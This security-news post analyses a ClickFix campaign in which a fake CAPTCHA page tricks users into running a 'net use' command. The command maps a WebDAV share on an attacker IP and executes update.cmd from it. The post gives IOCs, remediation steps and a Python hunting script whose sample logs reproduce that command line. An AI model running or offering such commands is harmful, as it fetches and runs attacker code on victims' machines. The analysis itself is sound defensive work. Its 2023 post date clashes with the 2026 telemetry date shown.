Security News Investigating a New Click-Fix Variant

Parkinsond

Dec 6, 2023
In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, “happyglamper[.]ro”. It prompts the user to open the Run dialog via “Win+R”, followed by “Ctrl+V” and “Enter”.
The website is not detected by either VT or NSW.

The malicious code copied to the clipboard, when saved as a .cmd file, is not detected by VT.

Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive on an external server, from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the uncommon later stages of the infection pattern, this campaign gives adversaries a high chance of evading defensive controls and staying under the radar of defenders.

The initial execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is removed.


Event: Malicious object detected
User type: Initiator
Application name: firefox.exe
Application path: C:\Program Files\Mozilla Firefox
Component: Web Threat Protection
Result description: Detected
Type: Trojan
Name: HEUR:Trojan.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object name: captcha.html
Object path: https:// happyglamper . ro/wp-content/plugins/mammoth-custom-for
SHA256 of an object: E63AA2ABA5D15EFE177D4C714B6AAE708521B15E74467592D4C4A6C4F7A462D7
MD5 of an object: 0A79B7D7FD87603437F6BE832DDB8C5B
Reason: Expert analysis
Databases release date: Today, 13/03/2026 10:29:00
 
Executive Summary
This incident involves a confirmed malicious social engineering campaign (Click-Fix) where users are manipulated into executing a malicious WebDAV network mapping command via a fake CAPTCHA page. Hard telemetry confirms the delivery of a trojanized WorkFlowy Electron application that establishes a beacon to a known C2 server.

Assessment
This indicates a multi-stage infection leveraging default Windows binaries to evade detection while establishing persistent unauthorized access.

Technical Analysis & Remediation

MITRE ATT&CK Mapping

T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1059.001 – Command and Scripting Interpreter: PowerShell
T1132.001 – Data Encoding: Standard Encoding
T1071.001 – Application Layer Protocol: Web Protocols
T1204.002 – User Execution: Malicious File

CVE Profile
N/A (Social Engineering)
CISA KEV Status: Inactive

Telemetry

IPs

94.156.170[.]255
144[.]31[.]165[.]173

Domains
happyglamper[.]ro
cloudflare.report/forever/e/

Files
WorkFlowy[.]exe (v1.4.1050)
update.cmd
%APPDATA%\id.txt
flowy.zip

Constraint
The structure suggests the payload executes heavily obfuscated Node.js JavaScript directly within the V8 engine, bypassing the Chromium sandbox.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

GOVERN (GV) – Crisis Management & Oversight

Command: Initiate incident response protocols for potential C2 beaconing and unauthorized software execution.

DETECT (DE) – Monitoring & Analysis

Command: Query EDR/SIEM for process executions of cmd[.]exe /c net use Z: https://94.156.170[.]255/webdav.
Command: Hunt for network connections to 144[.]31[.]165[.]173 or DNS requests for cloudflare.report.
Command: Scan file systems for the presence of %LOCALAPPDATA%\MyApp\WorkFlowy.exe and %APPDATA%\id.txt.
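The three DETECT hunts above, together with the “net use” WebDAV stage described at the start of the post, can be expressed as a small hunting script. The following is an added example, not code from the post, its author, or any EDR vendor. It reads a constructed, simplified Sysmon-style JSON-lines export (EventID 1 process creation, 3 network connection, 11 file creation, 22 DNS query); the field names follow Sysmon conventions, but every log line is made up for this example. The “net use” rule is generalised beyond the post’s single command line to any drive letter, any http(s) target, and the UNC spelling of a WebDAV share; the IOC values themselves are the ones quoted in the post.

```python
"""
Hunting helper for the ClickFix / WebDAV 'net use' chain described in the post.
Added example: not code from the original post, the thread author, or any vendor.
Reads a constructed, simplified Sysmon-style JSON-lines export.
"""
import json
import re
from collections import Counter
from typing import Iterable

# Indicators quoted from the post (written undefanged here so they can be matched).
IOC_IPS = {"94.156.170.255", "144.31.165.173"}
IOC_DOMAINS = {"happyglamper.ro", "cloudflare.report"}
# File-path tails from the post's Telemetry / DETECT sections (matched case-insensitively).
IOC_FILE_TAILS = (r"\myapp\workflowy.exe", r"\id.txt", r"\dl.zip", r"\flowy.zip", r"\update.cmd")

# Generalised from the post's single "net use Z: https://<ip>/webdav": any drive letter,
# any http(s) target, and the UNC spelling of a WebDAV share ("\\host@SSL@443\share").
NET_USE_WEBDAV = re.compile(
    r"\bnet(?:\.exe)?\s+use\b.*?(?:https?://|\\\\[^\s\\]+@)", re.IGNORECASE
)

# Constructed sample events (WS01 is the infected host, WS02 is clean).
SAMPLE_LOG = r"""
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c net use Z: https://94.156.170.255/webdav && Z:\\update.cmd && net use Z: /delete"}
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c net use H: \\\\fileserver.corp.local\\home"}
{"EventID": 22, "Computer": "WS01", "Image": "C:\\Users\\u\\AppData\\Local\\MyApp\\WorkFlowy.exe", "QueryName": "cloudflare.report"}
{"EventID": 3, "Computer": "WS01", "Image": "C:\\Users\\u\\AppData\\Local\\MyApp\\WorkFlowy.exe", "DestinationIp": "144.31.165.173", "DestinationPort": 443}
{"EventID": 11, "Computer": "WS01", "Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Users\\u\\AppData\\Roaming\\id.txt"}
{"EventID": 3, "Computer": "WS02", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationIp": "93.184.216.34", "DestinationPort": 443}
"""


def parse_jsonl(text: str) -> list[dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ioc_path(path: str) -> bool:
    p = path.strip('"').lower()
    return any(p.endswith(tail) for tail in IOC_FILE_TAILS)


def _ioc_domain(name: str) -> bool:
    n = name.lower().rstrip(".")
    return any(n == d or n.endswith("." + d) for d in IOC_DOMAINS)


def hunt(events: Iterable[dict]) -> list[dict]:
    """Apply the post's DETECT hunts to a stream of events; at most one hit per rule per event."""
    hits = []
    for ev in events:
        eid, host = ev.get("EventID"), ev.get("Computer")

        def hit(rule: str, evidence: str) -> None:
            hits.append({"rule": rule, "host": host, "event_id": eid, "evidence": evidence})

        # Hunt 1: a command shell mapping a WebDAV share with "net use".
        if eid == 1 and NET_USE_WEBDAV.search(ev.get("CommandLine", "")):
            hit("webdav_net_use", ev["CommandLine"])

        # Hunt 2: connections to the listed IPs, or DNS lookups for the listed domains.
        if eid == 3 and ev.get("DestinationIp") in IOC_IPS:
            hit("ioc_ip", ev["DestinationIp"])
        if eid == 22 and _ioc_domain(ev.get("QueryName", "")):
            hit("ioc_dns", ev["QueryName"])

        # Hunt 3: the dropped/staged files, seen as the running image, a file write,
        # or a command-line token (catches "Z:\update.cmd" launched from the mapped drive).
        candidates = [ev.get("Image", "")]
        if eid == 11:
            candidates.append(ev.get("TargetFilename", ""))
        if eid == 1:
            candidates.extend(ev.get("CommandLine", "").split())
        for path in candidates:
            if _ioc_path(path):
                hit("ioc_file", path)
                break
    return hits


def summarize(hits: list[dict]) -> dict[str, int]:
    """Number of hits per rule."""
    return dict(Counter(h["rule"] for h in hits))


def flagged_hosts(hits: list[dict]) -> list[str]:
    """Hosts with at least one hit, for isolation under the RESPOND step."""
    return sorted({h["host"] for h in hits})


if __name__ == "__main__":
    found = hunt(parse_jsonl(SAMPLE_LOG))
    for h in found:
        print(f'{h["host"]}  EID{h["event_id"]}  {h["rule"]:15} {h["evidence"]}')
    print(summarize(found), flagged_hosts(found))
```

On the constructed sample this flags only WS01: the WebDAV “net use” command line, the update.cmd token on that same command line, the DNS query and connection from WorkFlowy.exe, and the id.txt write, while the legitimate SMB mapping to the corporate file server and the browser traffic on WS02 produce nothing. In production the first rule will also fire on sanctioned http(s) WebDAV mappings (SharePoint, internal document servers), so pair it with an allowlist of known-good hosts rather than treating every hit as an incident.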

RESPOND (RS) – Mitigation & Containment

Command: Isolate affected endpoints from the corporate network immediately.
Command: Terminate any active WorkFlowy[.]exe and powershell[.]exe child processes associated with the attack chain.

RECOVER (RC) – Restoration & Trust

Command: Remove the %LOCALAPPDATA%\MyApp directory, %TEMP%\dl.zip, %APPDATA%\id.txt, and any dynamic staging directories in %TEMP%.
Command: Validate clean state via full-system anti-malware scans.

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

Command: Implement Web Content Filtering blocks for happyglamper[.]ro and cloudflare.report.
Command: Restrict outbound WebDAV traffic to untrusted external IP addresses.

Remediation - THE HOME USER TRACK (Safety Focus)

Priority 1: Safety

Command: Disconnect from the internet immediately.
Command: Do not log into banking/email until verified clean.

Priority 2: Identity

Command: Reset passwords/MFA using a known clean device (e.g., phone on 5G).

Priority 3: Persistence

Command: Check Scheduled Tasks, Startup Folders, and Browser Extensions.
Command: Manually delete the %LOCALAPPDATA%\MyApp folder and the %APPDATA%\id.txt tracking file if present.

Hardening & References

Baseline: CIS Benchmarks for Windows 10/11 (Disable outbound WebDAV/SMB and Windows Script Host where not explicitly required).
Framework: NIST CSF 2.0 / SP 800-61r3.
Source: The Hacker News